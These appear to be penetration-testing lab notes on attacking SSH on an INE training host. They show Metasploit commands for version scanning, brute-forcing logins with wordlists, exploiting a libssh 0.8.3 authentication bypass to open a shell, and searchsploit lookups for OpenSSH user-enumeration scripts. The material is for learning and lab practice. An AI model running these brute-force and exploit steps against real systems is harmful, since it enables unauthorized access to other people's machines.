# Port 22 SSH

### SSH Enumeration

#### Version Enumeration with Metasploit

```
msfconsole
use auxiliary/scanner/ssh/ssh_version
set RHOSTS demo.ine.local
exploit
```

<figure><img src="https://755681241-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fa5rXMZ1JAQhUeS7TtZkM%2Fuploads%2FZktcOTHCX1OWmAu2JSFa%2Fimage.png?alt=media&#x26;token=fea4aae1-0910-408b-9e5c-60ed131eb5c6" alt=""><figcaption></figcaption></figure>

### Bruteforce SSH

#### Metasploit SSH bruteforcing

We will now use ssh\_login module to find the valid credentials to access the ssh server.

```
use auxiliary/scanner/ssh/ssh_login
set RHOSTS demo.ine.local
set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/common_passwords.txt
set STOP_ON_SUCCESS true
set VERBOSE true
exploit
```

<figure><img src="https://755681241-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fa5rXMZ1JAQhUeS7TtZkM%2Fuploads%2FcM5y6faDDX3zZ72APzeu%2Fimage.png?alt=media&#x26;token=6e7fa289-979c-4269-857a-2ac5928b68d9" alt=""><figcaption></figcaption></figure>

<figure><img src="https://755681241-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fa5rXMZ1JAQhUeS7TtZkM%2Fuploads%2F5CvFpibnAFPkH6cEMagD%2Fimage.png?alt=media&#x26;token=f2e7fedd-772b-44ae-a2fc-edb7c2bb5dd0" alt=""><figcaption></figcaption></figure>

### SSH Exploitation

```
┌──(root㉿INE)-[~]
└─# nmap -sS -sV --script=vuln  demo.ine.local
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-12-14 20:21 IST
Nmap scan report for demo.ine.local (192.148.44.3)
Host is up (0.000028s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     libssh 0.8.3 (protocol 2.0)
MAC Address: 02:42:C0:94:2C:03 (Unknown)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.67 seconds
```

<figure><img src="https://755681241-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fa5rXMZ1JAQhUeS7TtZkM%2Fuploads%2Fy3QpSUsPwv3iJDPcHPNT%2Fimage.png?alt=media&#x26;token=7ea4ed84-bc22-4b51-9f06-eb26120f64e2" alt=""><figcaption></figcaption></figure>

#### Exploiting libssh with metasploit

<figure><img src="https://miro.medium.com/v2/resize:fit:700/1*a4yCCtfJkSgQ_Ht0F8BxyQ.png" alt="" height="213" width="700"><figcaption></figcaption></figure>

Metasploit has an exploit for this. In the same module, there are both auxiliary scans and the exploit itself. Since we need to exploit it, let’s first check the available options.

<figure><img src="https://miro.medium.com/v2/resize:fit:700/1*-wJzvYGW6woDOvci7qxqZQ.png" alt="" height="249" width="700"><figcaption></figcaption></figure>

For this exploit, we only need to set two parameters: `RHOSTS` and `SPAWN_PTY`. In the auxiliary section, we can confirm that it will directly spawn a shell once executed.

<figure><img src="https://miro.medium.com/v2/resize:fit:700/1*wykcW2O5OTNXIu9m_eEZLQ.png" alt="" height="81" width="700"><figcaption></figcaption></figure>

After setting the parameters, type `exploit` to execute the exploit and gain access to the shell.

<figure><img src="https://miro.medium.com/v2/resize:fit:700/1*YyJfrvZVt03H1W6G9pXlkg.png" alt="" height="89" width="700"><figcaption></figcaption></figure>

As the output shows, the session has been created and opened. To verify, type the following command: `sessions`

<figure><img src="https://miro.medium.com/v2/resize:fit:700/1*lQOkS2n53ap-NgDGqs34fA.png" alt="" height="91" width="700"><figcaption></figcaption></figure>

To use this session, type `sessions -i 2`. This will successfully grant us access to the shell.

<figure><img src="https://miro.medium.com/v2/resize:fit:700/1*KGzUhqEMg9eVHlgRDzTs7g.png" alt="" height="174" width="700"><figcaption></figcaption></figure>

#### OpenSSH Exploits

Given that we have obtained the exact version of OpenSSH running on the target system, we can utilize Searchsploit to search for exploits that affect this specific version of OpenSSH.

This can be done by running the following command:

```
searchsploit OpenSSH 7.1
```

As shown in the following screenshot, Searchsploit reveals various username enumeration scripts that can be used to enumerate user accounts.

<figure><img src="https://assets.ine.com/lab/learningpath/e26e012200b301f513488057ac6a5fea53bcce71db0d9f7fbde5f0f78e97f713.png" alt=""><figcaption></figcaption></figure>

We can utilize these scripts to enumerate user accounts on the target system,  we have already identified one user account that  can also be used to authenticate with the OpenSSH server.

### Metasploit SSH login

```
use auxiliary/scanner/ssh/ssh_login
set RHOSTS demo.ine.local
set USERNAME jackie
set PASSWORD password
exploit
```

<figure><img src="https://755681241-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fa5rXMZ1JAQhUeS7TtZkM%2Fuploads%2FBPn8F1FCoMEF39Hr6LJg%2Fimage.png?alt=media&#x26;token=39d1d632-d7c6-4999-a3a4-8a042989f2e1" alt=""><figcaption></figcaption></figure>